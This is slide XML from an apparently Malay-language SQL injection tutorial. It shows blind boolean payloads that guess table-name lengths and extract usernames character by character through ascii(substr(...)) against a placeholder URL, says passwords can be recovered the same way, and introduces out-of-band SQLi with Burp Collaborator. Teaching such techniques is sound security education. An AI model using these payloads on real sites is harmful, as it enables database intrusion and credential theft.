          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="19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2981F6-61FB-4C8D-AF7C-5D65343B47F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300507" y="734096"/>
            <a:ext cx="11187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AEF668-13FA-479F-BC83-4CF9931F3645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10740980" y="6323523"/>
            <a:ext cx="1493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4753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13A1-0835-4ABB-AA78-7D70A3A9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64" y="167424"/>
            <a:ext cx="9144000" cy="53494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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Guessing Table Name and String Length</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2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A4A50-39CF-4B80-A590-F7750DECC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63" y="997646"/>
            <a:ext cx="11329115" cy="5297364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latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Payload yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>digunakan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test String Length, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>maka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itulah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> string length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table: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900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (length((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>=database() limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,1))) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>atas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ini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test string length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table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>pertama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iaitu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nombor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> ‘0’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Selepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> dah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> string length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table,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kena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> extract ascii code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>supaya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dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> table name. Jika TRUE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>maka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itulah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> ascii code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pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>. Repeat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>benda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sama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next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sehingga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dpt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> table name 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900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>=database() limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,1) ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,1))) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>115</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>atas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ini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pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> ‘1’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> ‘0’ yang mana return TRUE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ascii code ‘115’</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="19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196DA-0663-46A7-94FC-EBBFE16CFFDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326264" y="850006"/>
            <a:ext cx="11329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7FE389-99FA-44C6-9D1B-B161550957F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10706633" y="6382404"/>
            <a:ext cx="1317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6028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EA0D-2A2B-41D5-80F3-F0F444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23" y="103029"/>
            <a:ext cx="9144000" cy="560701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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Guessing column username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> table</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2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0251C-FF89-4DA1-A259-31DC4DEFE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022" y="1073980"/>
            <a:ext cx="11329115" cy="5248140"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Macam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biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,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kena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> guess string length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column username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dahulu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> return TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>maka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itulah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> string length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column username 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900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (length((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="0" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="0" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> limit 0,1))) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="0" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>berdasarkan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contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, column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‘username’ table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‘users’ dan ‘4’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>itu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string length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username(column)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Next, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> guess username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>. Jika return TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>maka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itulah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huruf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-MY" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>http://domain.com/php?id=1' AND (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>((select username from users limit 0,1) ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>,1))) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>berdasarkan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contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>huruf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pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> ‘1’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> username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’68’ (ascii code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Then, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kita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ulang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sahaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>sama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untuk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dapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>. Dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kalau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nak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lebih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mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>pakai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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> je.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="1900" i="1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BA2ABB-3ECA-4AA5-A997-E068BB27EC23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352022" y="702367"/>
            <a:ext cx="11238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2EC64D-8F2C-4801-801E-BF274307C9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10736688" y="6360758"/>
            <a:ext cx="14553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6893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E870-4BD2-4112-954B-BDC88BF6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32" y="257577"/>
            <a:ext cx="9144000" cy="586459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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Out-of-Band SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2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9068A-CC97-4F28-963A-576FA7C6C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32" y="1584101"/>
            <a:ext cx="11097295" cy="4282225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latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Cara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exploit SQLi vulnerability kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ini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dengan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mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>(triggering) out-of-band network interactions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kepada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sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dikawal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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Cara paling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mudah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untuk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melaksanakan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serangan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out-of-band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adalah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dengan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menggunakan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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Burp Collaborator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. Server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ini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memberi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peluang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kepada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kita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untuk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custom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sendiri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pelbagai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jenis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network service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(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termasuklah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DNS), dan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kita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boleh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detect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waktu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interaksi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berlaku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di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dalam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rangkaian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selepas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kita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hantar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payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> yang vuln.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333332"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Untuk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pendedahan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yang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lebih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lanjut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,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kita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akan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lihat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di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dalam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 tutorial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>nanti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="19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ED2533-CF5D-4F4F-84CA-617BA4FBC80F}"/>
